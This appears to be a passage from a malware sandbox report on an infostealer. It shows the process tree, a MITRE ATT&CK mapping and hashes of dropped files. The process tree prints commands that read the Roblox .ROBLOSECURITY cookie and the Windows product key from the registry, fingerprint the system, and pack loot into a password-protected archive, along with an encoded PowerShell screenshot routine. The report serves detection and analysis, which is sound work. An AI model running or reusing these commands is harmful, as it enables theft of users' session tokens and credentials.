gACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2460
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0dcupvfc\0dcupvfc.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4116
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8D2C.tmp" "c:\Users\Admin\AppData\Local\Temp\0dcupvfc\CSC8E98A2B831C94355984620E7C291179.TMP"
        6⤵
        
        PID:3244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:760
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2348
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3444
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3612
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3816
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3164
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1656
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:3108
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:2660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI48562\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\gnKFW.zip" *"
    3⤵
    PID:3612
  - - C:\Users\Admin\AppData\Local\Temp\_MEI48562\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI48562\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\gnKFW.zip" *
      4⤵
      Executes dropped EXE
      PID:336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:1008
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:448
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:2824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:1768
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:1416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:4600
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:4560
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:3760
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2976

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

System Information Discovery

T1082

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b7f97ee2bb5ef7400cbda2017f941e0c

SHA1
5007f1ae8221edaa5d5c8a9656f397638f4f3aa5

SHA256
4a04a07b41860bd8c5170a6927ba06a84cdebfe3a883bb2c1678c764ec827565

SHA512
3fbad6b1d5fde1025b7d3f01ef9ca3b69c6ad850e8a01f63474ada5a3d08b85f13543d32a72801de662cfbffaf58de6d45d8b6ad274d14725a1e347e75255b08

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7511c81925750deb7ad1b9b80eea8a8d

SHA1
6ea759b3cbd243ae11435c6d6c5ced185eb01f49

SHA256
5b49723a7773f2fe1f6093236e7b9b2c546f0873635d02346cb39535811234fa

SHA512
5f7e69316d39525d137a7a833f8c746ceef8f1b2295348393fb3244cca8b962fbaad0f7da49da453fe97e2c49b1f41f06138111ac5ff97fdc33c300350ec3a1b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
57cf5b4f20a9bd9aa3f33cf96932b4fe

SHA1
fa4ecb966b57e4abc285d2c551c6411651b6d6a2

SHA256
ede812574b2c65796d971f7a0e8f5ff83828b22671d4485b4dd00bedce646da8

SHA512
a163ea6f0fd0df8ff2c5edc9b661f4a8fa9e9d8c988b0d93628ddbd19d46886be6d30b8651dfb280fe90b8ef01fc960b485f799271007f1e0fc9c5a9200972aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\0dcupvfc\0dcupvfc.dll

Filesize
4KB

MD5
00ae4875008c9c5a3e49697172072d42

SHA1
fd54783bf0bf8b61c999828042163391a8bfaaef

SHA256
f27b69490f2aea0e0dc01d863ab88c59fdfdda17a9c3ce41c7cf772ee40c095c

SHA512
63e9374a54bd7124003a3e5194674b3fc0d9f0e825f8b5ed3df6154f855f1d4edf910af8915ed9756d2bbb4b9007aea60225795f5bbad3611e87562396b31623

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES8D2C.tmp

Filesize
1KB

MD5
0f64b576082e88fa666a7c4e0d9afca7

SHA1
d0c4f8080b30356f1636a7d63a0d1b6a0d2fd18c

SHA256
f5abda5a791e44def6b508f76c1dc8fa7152a3aa5f51a58e68d3314073e3aa7f

SHA512
692717926d2dac81d7b1f42142412ce5ee7cbb0a0f964f61520e015ad241b19a929b6a3725a69a2a29249a48449fc696905b93356cf295c7ba742d6fa4a6672d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48562\VCRUNTIME140.dll

Filesize
96KB

MD5
f12681a472b9dd04a812e16096514974

SHA1
6fd102eb3e0b0e6eef08118d71f28702d1a9067c

SHA256
d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

SHA512
7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48562\_bz2.pyd

Filesize
46KB

MD5
365a59c0e5ded3b7e28d38810227c525

SHA1
350ae649e7c640b3838a27e15a6d505aebf3980a

SHA256
fe58f3d78f4ed3f14f2d83ec6aecc0986d76ad453aa37ebe3b77a6bb0e53164c

SHA512
c71170b3d1e88883e419c6f5c68a9f1d237d9c985b8f7d7f66eda9bb92aa91f385b1a5ebbfa261aa9c63ec52b7ef2c2efdd81675d9f97490e3407184f52514d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48562\_ctypes.pyd

Filesize
56KB

MD5
b3a39eab934c679cae09c03e61e44d3f

SHA1
e3d7e9770089de36bc69c8527250dbfac51367b7

SHA256
083fd5b8871869fb5571046e1c5336b0ca9b6e8dbc3d00983d81badd28a46ee2

SHA512
5704b9618e1a3750145e7e735890b646cf4cd0793a23628d2e70a263cd8bd77b12b55f3b9cb7f0b40da402507db994403e8d9fecb69f01865a3c56c6456c5cb6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48562\_decimal.pyd

Filesize
103KB

MD5
60a6c3c74980689f798dd5a6f6534358

SHA1
1ebb67ec7c26a3139057804b96d972db16ea9bf5

SHA256
3626f9674eccea781f7692ec55e8e408adbe7ffe78a68d3f6f7f3b84bf7920d4

SHA512
67cf5b1a85c8ee069bfbf88be69f19139d3cb7220c00375ef5f7bf9e987a9a4da3229e2973a96d8d3e82db9b9b9880611191f129d92b83cb7d71362a1e7ec0f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48562\_hashlib.pyd

Filesize
33KB

MD5
79bfcc531422a9a5527a52489a84eefd

SHA1
d5329f0181929fc63d728374b21e7d69e67d1c7f

SHA256
b82a2abcf2d71564f2f6334089f9e8a4d21cec70010d8b8e285349c0be4dcb59

SHA512
82046764927dcbfaabb519f4278c72eb959491464796f360c44aa5bb9192d5b61f225bac3f4401f51047c0c8c7df464be3abd9356a4479e6613e1d46bba1368d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48562\_lzma.pyd

Filesize
84KB

MD5
1f03e7153fea3cc11afde7972a16c37e

SHA1
3082b19a1bf18b78f5fcaaaa152064ac51d53257

SHA256
fa7f6ad91648bf52983996ec066fd666bc218c0f3cc1dabfe6ac9a7ac527b42a

SHA512
67c7f687acf839a5c23e2a89d76b2314853c2f8b05c2f46f3f7925a1e790e8341a14c35c38a349c0d7d91bc27500913a4149de58d3eb67bddf6720ba9d4b600e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48562\_queue.pyd

Filesize
24KB

MD5
223ab7bc616085ce00a4c243bbf25c44

SHA1
6e0d912248d577cc6c4aae1fc32812e2f9e348ee

SHA256
de632ca5b6cdb0e4bf6c9dd4881d68fea716c4a419f8ecad382c1b5e240f7804

SHA512
dbab43636cec0bfab8da538f9c55cba7e17907ff4f75b7f8f66737242809afad44a6fbed62971127401da619eda239988b07c1d9cfa859aa52e175d1d9fa7a6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48562\_socket.pyd

Filesize
41KB

MD5
75ed07feab770d600b2951db41da7904

SHA1
687dd0cce9de1cd60387493fafc71855b88e52d6

SHA256
cc323e6654e9e163d8f8b2aaf174836e31d088d0f939a1382c277ce1d808fe24

SHA512
ac1286f2343c110dade5e666222012247dd0168a9a30785fa943c0b91b89ad73c6bbef72b660212e899cb0bf15a8928d91ea244f6a3f89828d605f7f112dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48562\_sqlite3.pyd

Filesize
48KB

MD5
5aa561c43bdbd1924bcfa69887d0aa7f

SHA1
fbf7e5727f273700fe82dfded0122268e467ee3d

SHA256
08c465684295dfea5314cbb5bc7c6a571cacfcbc588d12da982363db62bf3368

SHA512
fb942c31bbfa35bec8393f70f894bd6e59b806bc73bcff56fab2228c7cce9d3ddee5652140e7540504cff0ea7f9a23907190334776f1ea4e5353bce08fac3be5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48562\_ssl.pyd

Filesize
60KB

MD5
566840174754de7e474827fe4ee3ac77

SHA1
a111c87863810fa894e5111bf1299dc1879838c3

SHA256
3dbab73045f6fb4243f5f5488fd2732e8ae76c05e37d6c11ce7e4bbe38288125

SHA512
16f4834b99c08f17fc8d913a80e06f83eb7aa98b27a5abba9b9c8bab2faaee2cc8c2e5be09fcd081d02a9e472bcd9c2a8914a0a24929966167c091b18781403d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48562\base_library.zip

Filesize
859KB

MD5
5e638253f7147888c4bd70ff47402fd9

SHA1
1cc147f9fa9eb3b55cccd311adeda7cc7cc8d133

SHA256
7a4cd7d37ec3e702df2e2d2a1f4b98fec0aeb65a7886e85a02a8c59d99caa924

SHA512
76b4d3f8384945aa9772d423666ccb7a7075a7b4f48c81120c0d414ce66cf0b2be354728ff8658d36cae839db36413bf3c264349a37ecff107eb5d7282c167c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48562\blank.aes

Filesize
75KB

MD5
d5e32091fca4b881b50b4f4693a41940

SHA1
3902e7066a4698b969350edddafcab6261d0af95

SHA256
c3898cb0b73741295f78d18d8300b967dc6e4f4303f7ca84da50ec63244f08fb

SHA512
a3afe0d6aa3f29ed07f78ebdaaabfc75bc66f0940314d207447080a8da37317675388a8f346da2c32cd1225fc5fa5a948f5505ddbd87d15f35530374feadc124

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48562\blank.aes

Filesize
75KB

MD5
c601c729d1ac82760c60732c87c01d85

SHA1
7b4d083c17a4088012d8cbb7948b72beac5f1823

SHA256
046827f25b05a87c7b301ca93acee981b70b4b5daa1a31e87ddfc1377be305fd

SHA512
13d1bc89b532ac4bab0a4cca96cd80fb7d8457ae74b97c2c79c09f058ca7e540174d0aa18fa921734fe1b6304bfa7aaa090ae81919c76cf3e69ff1e40362de89

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48562\libcrypto-1_1.dll

Filesize
1.1MB

MD5
daa2eed9dceafaef826557ff8a754204

SHA1
27d668af7015843104aa5c20ec6bbd30f673e901

SHA256
4dab915333d42f071fe466df5578fd98f38f9e0efa6d9355e9b4445ffa1ca914

SHA512
7044715550b7098277a015219688c7e7a481a60e4d29f5f6558b10c7ac29195c6d5377dc234da57d9def0c217bb3d7feca332a64d632ca105503849f15e057ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48562\libffi-7.dll

Filesize
23KB

MD5
6f818913fafe8e4df7fedc46131f201f

SHA1
bbb7ba3edbd4783f7f973d97b0b568cc69cadac5

SHA256
3f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56

SHA512
5473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48562\libssl-1_1.dll

Filesize
203KB

MD5
eac369b3fde5c6e8955bd0b8e31d0830

SHA1
4bf77158c18fe3a290e44abd2ac1834675de66b4

SHA256
60771fb23ee37b4414d364e6477490324f142a907308a691f3dd88dc25e38d6c

SHA512
c51f05d26fda5e995fe6763877d4fcdb89cd92ef2d6ee997e49cc1ee7a77146669d26ec00ad76f940ef55adae82921dede42e55f51bd10d1283ecfe7c5009778

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48562\python310.dll

Filesize
1.4MB

MD5
01988415e8fb076dcb4a0d0639b680d9

SHA1
91b40cffcfc892924ed59dc0664c527ff9d3f69c

SHA256
b101db1ddd659b8d8ffd8b26422fde848d5b7846e0c236f051fadb9412de6e24

SHA512
eab0c3ca4578751a671beb3da650b5e971a79798deb77472e42f43aa2bea7434ad5228a8fddbfff051ce05054dbf3422d418f42c80bc3640e0e4f43a0cf2ebbe

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48562\rar.exe

Filesize
615KB

MD5
9c223575ae5b9544bc3d69ac6364f75e

SHA1
8a1cb5ee02c742e937febc57609ac312247ba386

SHA256
90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

SHA512
57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48562\rarreg.key

Filesize
456B

MD5
4531984cad7dacf24c086830068c4abe

SHA1
fa7c8c46677af01a83cf652ef30ba39b2aae14c3

SHA256
58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

SHA512
00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48562\select.pyd

Filesize
24KB

MD5
c9ff47314e1d3a71d0f6169a6ed919f4

SHA1
a90e8d82205c14660deca06b6891dd48075bc993

SHA256
ad50f036e4a00f5ed30c10c65acd9a137d339d0390ff0e1b7643d2e25162f727

SHA512
601a94ddeabe54c73eb42f7e185abeb60c345b960e664b1be1634ef90889707fd9c0973be8e3514813c3c06cc96287bb715399b027da1eb3d57243a514b4b395

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48562\sqlite3.dll

Filesize
606KB

MD5
fe5632ab5e7e35564059bd81ff07722f

SHA1
b45a9282d1e33585b07d92457a73b5907538db83

SHA256
4ae89a7a36c9fed607d38069635acd1801c000cac57558951175db33d3f2eeac

SHA512
f79d00000ef7018bafd69ae299ae1a06d36aa2498f64dcb33aa4eed66fd7e444ea524994c0469f3714431e6f7e5dbdaebd31bce253bebf3ecbf693a85dd31133

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48562\unicodedata.pyd

Filesize
288KB

MD5
fa458852aa48b6d397ae5e4dcb624d07

SHA1
5b224fc953062ec4b5d4965c9b4b571c12b7f434

SHA256
4472adfe11946f3bca0097eb3ca25f18101d97c152a82c9cb188b88f67b9dc4a

SHA512
879784fa9215055937d28ddd8408c5d14a97b3699139a85405bc11d6eb56f42dbce85bf76b911640887895dc405f43d51fdcf671107a5ea1aae1f1669ceab1e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kbk03u52.eod.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\gnKFW.zip

Filesize
427KB

MD5
a2ee2e36afdee57388ca45558c3e33cd

SHA1
302f3e90db93d7a35257cfdbd137180e6f86fcdc

SHA256
a6dfe95ce02dc2b48c64ff206f813e526552fe8a476169e3a2e515b37e8ef375

SHA512
d24465e7feafd9c779ed7ed2a9f559fe8ec001db391a4379fa502e52a5fa25946b143ad5336f5e51b42c6e63c80708d16fb6346c6fb402fce3c9be97a5b8a729

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‍ \Credentials\Chrome\Chrome Cookies.txt

Filesize
258B

MD5
1a29a3922dd0456ed7f8711f55f23336

SHA1
fbcb1bf413cf570e202aac5dfdcf43772bf9ce61

SHA256
f05c9bc3c11b16b615b8ab3519133359b689dfbdcc3d2e07576cca2619824f05

SHA512
61447e8d83b66db03a3433ccc947928a600e958db2d36c84c589593a5474215ee449363c3cc3bf6fafc374240f8afa6c7afae2f28ae8339677fe236ddc99c4b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‍ \Directories\Desktop.txt

Filesize
560B

MD5
b9a6031bd47d920dc5761b5c59d1c03c

SHA1
cb4732e196b96c327d497036a6f521f5dbe3109e

SHA256
023ab22ea7d5d5e636a743b1375f6364a94c18ae0b4b63e1dcf3bab48f723ffe

SHA512
3e1e007e71912ee29c34ab03015b425688c54f32360657388e46fd9507026aa60b3b8d8d3b6ff56b5266350bc8a9b7bae70444574226f0869cd199f29984bcdc

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‍ \Directories\Documents.txt

Filesize
968B

MD5
51e835d178b762aa8a9b620ee7b946fa

SHA1
d7156de272544d3526cb8d057c417335a6d308d6

SHA256
5db6fe22f5bf186085d3905efaa9f53c443afa592c7f3c386f728312c5c7ed11

SHA512
d7561585bd45ba402eb296481ebc9b774351ebbf730d51dad7cb3484f9f9615469b543e04768ed61b8840283f9651f9f5718e8f3de8f713f83f2abdc3c32e87b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‍ \Directories\Downloads.txt

Filesize
795B

MD5
1fc7f7996947dff81cc10f2ab530ca9b

SHA1
db5987b3be91ca7e604cc97750fae09cd796d4b6

SHA256
5032df910344b4ea877c9f8f922a655563d09724a27039e72ab2a60ee9498eaa

SHA512
3856186934753cb8f77962bf20dedd58d060c2f413bf7eac33c6a143816bf9d80572a98e4b5f8d7ec48250b5a1c249838eb0f77e453a65c4ab4fa98132007f54

Download Submit
